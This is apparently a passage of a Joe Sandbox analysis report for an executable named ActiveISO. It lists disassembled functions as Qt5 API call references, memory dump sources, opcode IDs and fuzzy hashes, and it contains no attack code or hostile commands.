                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$free$mallocmemmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1520635756-0
                                                                                                                  • Opcode ID: 405c96dee884d3d7649f9aa90ec5223d2b90e05b58e8af1403bd7e825602b3ab
                                                                                                                  • Instruction ID: ede8949a093303790fe3f1cf6955bcb8b58cc02084156b9261effca96a62171b
                                                                                                                  • Opcode Fuzzy Hash: 405c96dee884d3d7649f9aa90ec5223d2b90e05b58e8af1403bd7e825602b3ab
                                                                                                                  • Instruction Fuzzy Hash: B5618C72A29B8686DA64CF26E4453AE73A5FB88F84F884131DE6EA7754DF3CD444C304
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _ctime64_time64wcsncpy
                                                                                                                  • String ID: $%s_%S%s$;
                                                                                                                  • API String ID: 2365344445-1038349641
                                                                                                                  • Opcode ID: f07597088935fc6c5e2d57aac06f43ba62fa10d016b07338ef2ce387b49c0310
                                                                                                                  • Instruction ID: 05bef7b14b6452f92b3121f02931eadc7c6ecefc981e2b917155e57a553c3b08
                                                                                                                  • Opcode Fuzzy Hash: f07597088935fc6c5e2d57aac06f43ba62fa10d016b07338ef2ce387b49c0310
                                                                                                                  • Instruction Fuzzy Hash: 6941CF62E28E8680EB549F14E0062BD73A2FB94F94F494235DA5EA37A4EF7CD446C344
                                                                                                                  APIs
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF6537314DE), ref: 00007FF65373190A
                                                                                                                  • ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE(?,?,?,00007FF6537314DE), ref: 00007FF65373191E
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF6537314DE), ref: 00007FF65373192F
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF6537314DE), ref: 00007FF653731941
                                                                                                                    • Part of subcall function 00007FF653731B20: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FF653731958,?,?,?,00007FF6537314DE), ref: 00007FF653731B68
                                                                                                                  • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF6537314DE), ref: 00007FF653731965
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF6537314DE), ref: 00007FF653731971
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF6537314DE), ref: 00007FF6537319BB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@$?detach_grow@?end@Array@@ByteData@1@V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1204114502-0
                                                                                                                  • Opcode ID: 8cc3f2dafbe389cd9f2bd781859cdf61a8649993aa560679ab01638d722f2943
                                                                                                                  • Instruction ID: 21dfec7ab239b62dd942948bc0f2c70fa0a8f96b4e9856cf1fdc133d38211a1d
                                                                                                                  • Opcode Fuzzy Hash: 8cc3f2dafbe389cd9f2bd781859cdf61a8649993aa560679ab01638d722f2943
                                                                                                                  • Instruction Fuzzy Hash: FD21B021E19A5142FA00AB66985547DA761FF89FE5F084130DD0EB3BA4DF3CD1478B09
                                                                                                                  APIs
                                                                                                                  • ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS(?,?,?,00007FF65375621B), ref: 00007FF653756D40
                                                                                                                  • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE(?,?,?,00007FF65375621B), ref: 00007FF653756D5A
                                                                                                                  • ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS(?,?,?,00007FF65375621B), ref: 00007FF653756D63
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS(?,?,?,00007FF65375621B), ref: 00007FF653756D74
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: WizardWizard@@$?wizard@Page@@$?disconnect@?setD01@Object@@Option@Option@1@_
                                                                                                                  • String ID: 1manualActivate()$2customButtonClicked(int)
                                                                                                                  • API String ID: 1474533983-2015327854
                                                                                                                  • Opcode ID: 60be2a8aa939768ea1bca954313249a3e514df52f220886695694ab4c5ed353a
                                                                                                                  • Instruction ID: 506276ebc57a645b038b240144cf8761c5078420bc44e3ddbd8b92e751db1093
                                                                                                                  • Opcode Fuzzy Hash: 60be2a8aa939768ea1bca954313249a3e514df52f220886695694ab4c5ed353a
                                                                                                                  • Instruction Fuzzy Hash: D711F627614E9581EB50CF26D4A52AC23A2FBC4F99F568032DE4F57364DE38C498C390
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Edit@@Line$?set?text@Enabled@Widget@@$?validator@Validator@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 696241969-0
                                                                                                                  • Opcode ID: c54a20a4d77a993f7d372cc00f48b851d07cb2747c98253d5c1b57fd5597ffe1
                                                                                                                  • Instruction ID: 5308cd7dd00e75b288e7aa1e9fdaddf136093d32a5901fa547fc358e200f7485
                                                                                                                  • Opcode Fuzzy Hash: c54a20a4d77a993f7d372cc00f48b851d07cb2747c98253d5c1b57fd5597ffe1
                                                                                                                  • Instruction Fuzzy Hash: 5B115E32A18A82D3EB10CF56E885069A332FB85FA9F544131DB5EA3664CF78D459C744
                                                                                                                  APIs
                                                                                                                  • ?className@QMetaObject@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,00007FF65373E1FE,?,?,?,?,?,00007FF65373DADF), ref: 00007FF65373DB73
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65373E1FE,?,?,?,?,?,00007FF65373DADF), ref: 00007FF65373DB81
                                                                                                                  • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,?,00007FF65373E1FE,?,?,?,?,?,00007FF65373DADF), ref: 00007FF65373DBA2
                                                                                                                  • ?append@QByteArray@@QEAAAEAV1@PEBD@Z.QT5CORE(?,?,?,?,?,00007FF65373E1FE,?,?,?,?,?,00007FF65373DADF), ref: 00007FF65373DBB0
                                                                                                                  • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,00007FF65373E1FE,?,?,?,?,?,00007FF65373DADF), ref: 00007FF65373DBBB
                                                                                                                  • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FF65373DBE7
                                                                                                                  • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF65373DBFB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$Meta$?append@$?class?register?reserve@Flag@Flags@Name@NormalizedObject@@Object@@@String@@TypeType@Type@@Type@@@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3321901786-0
                                                                                                                  • Opcode ID: 724bfb05986e4d387d564f9eb894789306c776040b495cc11c14b7f0449e2567
                                                                                                                  • Instruction ID: c060da5c4cf145cdae48c0c1dfa77623ef62f802e6bd6aa18e3687b28b210882
                                                                                                                  • Opcode Fuzzy Hash: 724bfb05986e4d387d564f9eb894789306c776040b495cc11c14b7f0449e2567
                                                                                                                  • Instruction Fuzzy Hash: B6115431E28A4292E700CF64E8410B97362FB95F64F580235D65DF36A4DF3DD949C744
                                                                                                                  APIs
                                                                                                                  • ?readAll@QIODevice@@QEAA?AVQByteArray@@XZ.QT5CORE ref: 00007FF653749166
                                                                                                                  • ??0QString@@QEAA@AEBVQByteArray@@@Z.QT5CORE ref: 00007FF653749177
                                                                                                                  • ??8QString@@QEBA_NPEBD@Z.QT5CORE ref: 00007FF653749195
                                                                                                                  • ??8QString@@QEBA_NPEBD@Z.QT5CORE ref: 00007FF6537491B4
                                                                                                                    • Part of subcall function 00007FF653742F40: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742F5B
                                                                                                                    • Part of subcall function 00007FF653742F40: ??0QVariant@@QEAA@PEBD@Z.QT5CORE ref: 00007FF653742F8F
                                                                                                                    • Part of subcall function 00007FF653742F40: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742FA2
                                                                                                                    • Part of subcall function 00007FF653742F40: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF653742FBC
                                                                                                                    • Part of subcall function 00007FF653742F40: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742FC8
                                                                                                                    • Part of subcall function 00007FF653742F40: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742FD4
                                                                                                                    • Part of subcall function 00007FF653742F40: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653742FE0
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537491E8
                                                                                                                  • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF6537491F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Byte$?fromArrayArray@@Ascii_helper@Data@Settings@@TypedVariant@@$?read?setAll@Array@@@Device@@Value@Variant@@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1323203718-0
                                                                                                                  • Opcode ID: 8dd18797b78a7255e110c85ea5125eb2a8de4512842379179e0b98b2cb98d72d
                                                                                                                  • Instruction ID: 44b47a5bc5c2b7f6126391f67c514b83cc5e7c93d78eb040aa6177810f8d9aae
                                                                                                                  • Opcode Fuzzy Hash: 8dd18797b78a7255e110c85ea5125eb2a8de4512842379179e0b98b2cb98d72d
                                                                                                                  • Instruction Fuzzy Hash: DE115121D2C943A2EE009B54E8464B92332FF92F50F981131D69EF35E5CF2DE909C748
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$Meta$?append@$?class?register?reserve@Flag@Flags@Name@NormalizedObject@@Object@@@String@@TypeType@Type@@Type@@@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3321901786-0
                                                                                                                  • Opcode ID: 613726d199334f96be99b5c3b272999a03daab605c09141914d7f202683924ef
                                                                                                                  • Instruction ID: 135269a3e3637196627aa87d2b41f3c68c20f51cca1420a2a6bf28e855bba458
                                                                                                                  • Opcode Fuzzy Hash: 613726d199334f96be99b5c3b272999a03daab605c09141914d7f202683924ef
                                                                                                                  • Instruction Fuzzy Hash: 71116031E28A4295E7008F64E8411657762FB84BB4F480335D96EF66E4DF7CD449C748
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743176
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??0QSettings@@QEAA@AEBVQString@@W4Format@0@PEAVQObject@@@Z.QT5CORE ref: 00007FF653746CE1
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?setIniCodec@QSettings@@QEAAXPEBD@Z.QT5CORE ref: 00007FF653746CFC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746D17
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653746D2A
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D36
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D4E
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374319D
                                                                                                                  • ?remove@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF6537431B2
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537431BE
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF6537431CA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Settings@@$?fromArrayAscii_helper@Data@Typed$String@@@$?begin?remove@?setCodec@Format@0@Group@Object@@@
                                                                                                                  • String ID: Address
                                                                                                                  • API String ID: 967898024-3270727197
                                                                                                                  • Opcode ID: 898a4c4f911d94e7893842cf8cb6683e542dd73595262509d3056f4ed7996eab
                                                                                                                  • Instruction ID: 1071288843569edf357989b2930a4f19d0bfe485d79dd910bbfdef82146903a2
                                                                                                                  • Opcode Fuzzy Hash: 898a4c4f911d94e7893842cf8cb6683e542dd73595262509d3056f4ed7996eab
                                                                                                                  • Instruction Fuzzy Hash: 10F0E122E18A4192E610DB50F84206AB722FBD5B75F840331D19EA2AF4DF7CD659C748
                                                                                                                  APIs
                                                                                                                  • memset.VCRUNTIME140 ref: 00007FF653719DE8
                                                                                                                  • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,00007FF653717FB2), ref: 00007FF653719E2B
                                                                                                                  • ?qBadAlloc@@YAXXZ.QT5CORE(?,?,?,?,?,00007FF653717FB2), ref: 00007FF653719E3E
                                                                                                                  • memset.VCRUNTIME140 ref: 00007FF653719EFA
                                                                                                                  • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(?,?,?,?,?,00007FF653717FB2), ref: 00007FF653719F79
                                                                                                                  • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,?,?,00007FF653717FB2), ref: 00007FF653719FD5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array$Data@@$U1@_memset$?allocate@?deallocate@?sharedAlloc@@AllocationData@@@@@Flags@Null@Option@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1824798852-0
                                                                                                                  • Opcode ID: 10b65ef09ef1cd182941a0eab23dc620bc2a5f3a0bb7fbefdd8d294e3eb0110f
                                                                                                                  • Instruction ID: cf72274cb693a4530ab92f4ad9a0dd9fe5982f9553a8cd7ce554e884f12e49e5
                                                                                                                  • Opcode Fuzzy Hash: 10b65ef09ef1cd182941a0eab23dc620bc2a5f3a0bb7fbefdd8d294e3eb0110f
                                                                                                                  • Instruction Fuzzy Hash: EE71DD33B15A9182FA90CB15D152B6CB3AAFB45F84F098236DA0DB7B94DE3CE016C344
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Upper@$??8@String@@0@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3908153691-0
                                                                                                                  • Opcode ID: f122aac20eda7665ba86bca19dda133f5a805cdb81ea71e2bf269899a9ec28cb
                                                                                                                  • Instruction ID: bd3a072ffd96ef311f2458cc9f5a88e987a435519d6c600baaa00c2fc5cf2193
                                                                                                                  • Opcode Fuzzy Hash: f122aac20eda7665ba86bca19dda133f5a805cdb81ea71e2bf269899a9ec28cb
                                                                                                                  • Instruction Fuzzy Hash: FB41B362E28F8186EA60CF15E4862697362FB84FD4F498236DE5E63794DF3CD495C304
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?append@?at@?data@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3443117696-0
                                                                                                                  • Opcode ID: 9cfce89f6ba7a73fd247b52d18d22a587b5c2e5075ff617f749c2e708d5f95f9
                                                                                                                  • Instruction ID: 0303eef4eb01c7ec6ff3e6389ab47f6b3771133155c958c51d8925a9833c4b2f
                                                                                                                  • Opcode Fuzzy Hash: 9cfce89f6ba7a73fd247b52d18d22a587b5c2e5075ff617f749c2e708d5f95f9
                                                                                                                  • Instruction Fuzzy Hash: F941D232E38A4296E750EB15E44267963E2FB85F84F088431EA4EB7754DF3CE411C748
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
